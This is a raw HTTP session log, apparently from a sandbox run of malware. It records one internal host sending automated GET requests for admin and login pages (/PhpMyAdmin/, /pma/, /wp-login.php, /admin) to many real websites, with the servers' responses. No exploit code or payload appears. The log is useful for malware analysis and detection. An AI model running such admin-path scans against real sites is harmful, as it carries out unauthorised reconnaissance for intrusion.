                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:10.678659916 CET | 801 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.17.9
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.4
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: osCsid=75ead7575354d04015590554959bc526; expires=Mon, 04 Mar 2024 11:16:10 GMT; Max-Age=2419200; path=/; domain=.imvu.com; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: osCsid=75ead7575354d04015590554959bc526; expires=Mon, 04 Mar 2024 11:16:10 GMT; Max-Age=2419200; path=/; domain=.imvu.com; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                location: https://pt.secure.imvu.com/admin/
                                                                                                                                                                                                                                                                                                                                                                x-imvu-rnd: 2FzVpkirM5RWuKPfsD0ZsTNMaoHF7GF
                                                                                                                                                                                                                                                                                                                                                                X-Server: Smartling
                                                                                                                                                                                                                                                                                                                                                                X-SL-Notranslate: 1
                                                                                                                                                                                                                                                                                                                                                                X-SL-Norewrite: 1
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
481 | 192.168.2.6 | 65123 | 124.237.208.37 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:10.510327101 CET | 168 | OUT | GET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pan.baidu.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:11.223927975 CET | 168 | OUT | GET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pan.baidu.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:11.620256901 CET   1280   IN   HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Etag: W/"62650964-3feb"
                                                                                                                                                                                                                                                                                                                                                                Logid: 8900821104636489671
                                                                                                                                                                                                                                                                                                                                                                P3p: CP=" OTI DSP COR IVA OUR IND COM "
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PANPSC=; expires=Fri, 01-Apr-1900 00:00:00 GMT; path=/; domain=pan.baidu.com; HttpOnly;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: BAIDUID=68F91CB36893B7EB62E3CE0CD37C2F12:FG=1; expires=Tue, 04-Feb-25 11:16:11 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: BaiduCloud
                                                                                                                                                                                                                                                                                                                                                                Yld: 8900821104636489671
                                                                                                                                                                                                                                                                                                                                                                Yme: ZIGW/y8rX0wSdTcES3b+qnFLvvIASADwtAFKxCqAkOm5
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
Feb 5, 2024 12:16:11.620290041 CET   5   IN   Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
Feb 5, 2024 12:16:11.625402927 CET   5   IN   Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
Feb 5, 2024 12:16:11.833462954 CET   1280   IN   HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Etag: W/"62650964-3feb"
                                                                                                                                                                                                                                                                                                                                                                Logid: 8900821104636489671
                                                                                                                                                                                                                                                                                                                                                                P3p: CP=" OTI DSP COR IVA OUR IND COM "
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PANPSC=; expires=Fri, 01-Apr-1900 00:00:00 GMT; path=/; domain=pan.baidu.com; HttpOnly;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: BAIDUID=68F91CB36893B7EB62E3CE0CD37C2F12:FG=1; expires=Tue, 04-Feb-25 11:16:11 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: BaiduCloud
                                                                                                                                                                                                                                                                                                                                                                Yld: 8900821104636489671
                                                                                                                                                                                                                                                                                                                                                                Yme: ZIGW/y8rX0wSdTcES3b+qnFLvvIASADwtAFKxCqAkOm5
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
Feb 5, 2024 12:16:11.986901045 CET   5   IN   Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID   Source IP   Source Port   Destination IP   Destination Port
482   192.168.2.6   65202   34.149.46.130   80
Timestamp   Bytes transferred   Direction   Data
Feb 5, 2024 12:16:10.575484037 CET   176   OUT   GET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.snapchat.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:10.677953959 CET   205   IN   HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.snapchat.com:443/admin
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


Session ID   Source IP   Source Port   Destination IP   Destination Port
483   192.168.2.6   65207   195.85.23.95   80
Timestamp   Bytes transferred   Direction   Data
Feb 5, 2024 12:16:10.589904070 CET   171   OUT   GET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ro.bongacams.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:10.838881969 CET | 1226 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                set-cookie: bonga20120608=df106ebcbffc1861ca322b6f3f8633ab; path=/; domain=.bongacams.com; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                location: https://ro.bongacams.com/admin
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                x-zone: 3-ded6941-web19
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: ts_type2=1; expires=Tue, 04-Feb-2025 11:16:10 GMT; Max-Age=31536000; path=/; domain=.bongacams.com
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: fv=ZQp3ZGZkAmN3ZD==; expires=Tue, 04-Feb-2025 11:16:10 GMT; Max-Age=31536000; path=/; domain=.bongacams.com
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: uh=FyE6pTEiExAnn0c6AKy6A2cAoJquHD==; expires=Tue, 04-Feb-2025 11:16:10 GMT; Max-Age=31536000; path=/; domain=.bongacams.com
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __cf_bm=hYI9uaB5o1Z9vOPanp05auLoaQukIGLPJXDgF1LPBXk-1707131770-1-AV82M4ZN3NGdbY1RWqCn2CYbGXaWAtlSiuSCRk+M1uMz6ANcyYTABpz0ar3eNHcldxpImA+s0kWuevSh8Lkq75k=; path=/; expires=Mon, 05-Feb-24 11:46:10 GMT; domain=.bongacams.com; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd5e8b0badd1-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 65<html><head><meta http-equiv="refresh" content="0;url=https://ro.bongacams.com/admin"/></head></html>
Feb 5, 2024 12:16:10.838897943 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
484 | 192.168.2.6 | 65208 | 3.134.125.175 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:11.145489931 CET | 190 | OUT | GET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: 3fba-180-252-166-236.ngrok.io
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:11.269541979 CET | 328 | IN | HTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Location: https://3fba-180-252-166-236.ngrok.io/PhpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Ngrok-Trace-Id: 12a629b6607b6c0a3e4b72ee0c1a5da5
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 85
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <a href="https://3fba-180-252-166-236.ngrok.io/PhpMyAdmin/">Temporary Redirect</a>.


Session ID | Source IP | Source Port | Destination IP | Destination Port
485 | 192.168.2.6 | 65214 | 138.197.59.199 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:11.145543098 CET | 184 | OUT | GET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: api.cmrsanmartin.ziz.cl
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:11.267512083 CET | 564 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Location: https://api.cmrsanmartin.ziz.cl/PhpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 340
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://api.cmrsanmartin.ziz.cl/PhpMyAdmin/">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at api.cmrsanmartin.ziz.cl Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
486 | 192.168.2.6 | 65241 | 45.60.0.44 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:11.145649910 CET | 176 | OUT | GET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: m.codere.com.co
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:11.408241034 CET | 961 | IN | HTTP/1.1 302 Redirect
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Location: https://m.codere.com.co/PhpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 158
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: visid_incap_2786379=nJ2nIEwwQtOC8ksVLl53JHrDwGUAAAAAQUIPAAAAAACXTPPl6ZJPhBOZf1gL0Zya; expires=Tue, 04 Feb 2025 10:21:10 GMT; HttpOnly; path=/; Domain=.codere.com.co
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: nlbi_2786379=Gm27FDXtdluMyfn/aJQkpgAAAAB2SWEC4z8u2KD9iiENxNub; path=/; Domain=.codere.com.co
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: incap_ses_1816_2786379=7R8kW7naZWqCfxA+arozGXvDwGUAAAAAo66y6WgRP5rMrf2DD5XNTw==; path=/; Domain=.codere.com.co
                                                                                                                                                                                                                                                                                                                                                                X-CDN: Imperva
                                                                                                                                                                                                                                                                                                                                                                X-Iinfo: 32-27694274-27694371 NNNY CT(118 -1 0) RT(1707131770438 501) q(0 0 0 36) r(1 1) U24
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://m.codere.com.co/PhpMyAdmin/">here</a></body>


Session ID  Source IP    Source Port  Destination IP   Destination Port
487         192.168.2.6  65233        3.141.96.53      80
Timestamp                           Bytes transferred  Direction  Data
Feb 5, 2024 12:16:11.145704985 CET  175                OUT        GET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: money-farm.cc
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:11.270936966 CET  150                IN         HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                location: https://money-farm.cc/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP   Destination Port
488         192.168.2.6  65247        170.114.52.2     80
Timestamp                           Bytes transferred  Direction  Data
Feb 5, 2024 12:16:11.145749092 CET  174                OUT        GET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: gitam.zoom.us
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:11.294595957 CET  1000               IN         HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 134
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://gitam.zoom.us/PhpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __cf_bm=f..OOXkXYg7C3sValW.JT9TBRtH489XDoqC0_PadtzA-1707131771-1-AdQ98SPZEFYHOKf/EpHVT80tuCLrv/AjblCtE2qBlyK+nQbJmWAUNuqsO2PsiP4D2Zes8WDOJjq83a7ZAzYrEUo=; path=/; expires=Mon, 05-Feb-24 11:46:11 GMT; domain=.zoom.us; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ePPGSeqn1uGJdtXKQNOi7OTqszjWzio0E9NryE7yoRE%2F59mUuCRnrdjxiBBQTDJajllpmjIVucj3scg93Wx9jvHA4zFhAjQPk57amx573tXzWrDivqPNhcHEjkAGuME%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd61fa8253e7-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


Session ID  Source IP    Source Port  Destination IP   Destination Port
489         192.168.2.6  65206        31.216.144.5     80
Timestamp                           Bytes transferred  Direction  Data
Feb 5, 2024 12:16:11.146287918 CET  166                OUT        GET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mega.nz
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:11.349755049 CET  160                IN         HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: MEGA-Chrome-Antileak
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                                                                                                                                                Connection: close


Session ID  Source IP    Source Port  Destination IP   Destination Port
490         192.168.2.6  65205        188.212.100.154  80
Timestamp                           Bytes transferred  Direction  Data
Feb 5, 2024 12:16:11.146342993 CET  173                OUT        GET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: zarkana2.ro
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:11.381987095 CET  1031               IN         HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                                                                                                                                                                                                content-length: 795
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:17:37 GMT
                                                                                                                                                                                                                                                                                                                                                                server: LiteSpeed
                                                                                                                                                                                                                                                                                                                                                                location: https://zarkana2.ro/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
Feb 5, 2024 12:16:12.480519056 CET  213                OUT        GET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: zarkana2.ro
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: https://zarkana2.ro/wp-login.php
Feb 5, 2024 12:16:12.714401007 CET | 1028 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                                                                                                                                                                                                content-length: 795
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:17:39 GMT
                                                                                                                                                                                                                                                                                                                                                                server: LiteSpeed
                                                                                                                                                                                                                                                                                                                                                                location: https://zarkana2.ro/wp-admin/
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
491 | 192.168.2.6 | 63054 | 124.237.208.37 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:11.146393061 CET | 167 | OUT | GET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pan.baidu.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:14.317679882 CET | 167 | OUT | GET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pan.baidu.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:17.317924976 CET | 167 | OUT | GET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pan.baidu.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:17.699038982 CET | 1280 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:17 GMT
                                                                                                                                                                                                                                                                                                                                                                Etag: W/"62650964-3feb"
                                                                                                                                                                                                                                                                                                                                                                Logid: 8900822735141870389
                                                                                                                                                                                                                                                                                                                                                                P3p: CP=" OTI DSP COR IVA OUR IND COM "
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PANPSC=; expires=Fri, 01-Apr-1900 00:00:00 GMT; path=/; domain=pan.baidu.com; HttpOnly;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: BAIDUID=1773582DABE69F520ED57F4947DABDC1:FG=1; expires=Tue, 04-Feb-25 11:16:17 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: BaiduCloud
                                                                                                                                                                                                                                                                                                                                                                Yld: 8900822735141870389
                                                                                                                                                                                                                                                                                                                                                                Yme: ZIGW/y8rV0UMaTQNUmr/tG1LteUfQwbrqwZPySKDnO8=
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
Feb 5, 2024 12:16:17.911593914 CET | 1280 | IN | HTTP/1.1 404 Not Found
Connection: keep-alive
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 05 Feb 2024 11:16:17 GMT
Etag: W/"62650964-3feb"
Logid: 8900822735141870389
P3p: CP=" OTI DSP COR IVA OUR IND COM "
Server: nginx
Set-Cookie: PANPSC=; expires=Fri, 01-Apr-1900 00:00:00 GMT; path=/; domain=pan.baidu.com; HttpOnly;
Set-Cookie: BAIDUID=1773582DABE69F520ED57F4947DABDC1:FG=1; expires=Tue, 04-Feb-25 11:16:17 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
Vary: Accept-Encoding
Vary: Accept-Encoding
X-Powered-By: BaiduCloud
Yld: 8900822735141870389
Yme: ZIGW/y8rV0UMaTQNUmr/tG1LteUfQwbrqwZPySKDnO8=
Transfer-Encoding: chunked
Feb 5, 2024 12:16:18.318720102 CET | 1280 | IN | HTTP/1.1 404 Not Found
Connection: keep-alive
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 05 Feb 2024 11:16:17 GMT
Etag: W/"62650964-3feb"
Logid: 8900822735141870389
P3p: CP=" OTI DSP COR IVA OUR IND COM "
Server: nginx
Set-Cookie: PANPSC=; expires=Fri, 01-Apr-1900 00:00:00 GMT; path=/; domain=pan.baidu.com; HttpOnly;
Set-Cookie: BAIDUID=1773582DABE69F520ED57F4947DABDC1:FG=1; expires=Tue, 04-Feb-25 11:16:17 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
Vary: Accept-Encoding
Vary: Accept-Encoding
X-Powered-By: BaiduCloud
Yld: 8900822735141870389
Yme: ZIGW/y8rV0UMaTQNUmr/tG1LteUfQwbrqwZPySKDnO8=
Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port
492 | 192.168.2.6 | 65260 | 44.195.133.145 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:11.146436930 CET | 179 | OUT | GET /PhpMyAdmin/ HTTP/1.1
Host: ucv.blackboard.com
Accept: */*
Accept-Encoding: deflate, gzip
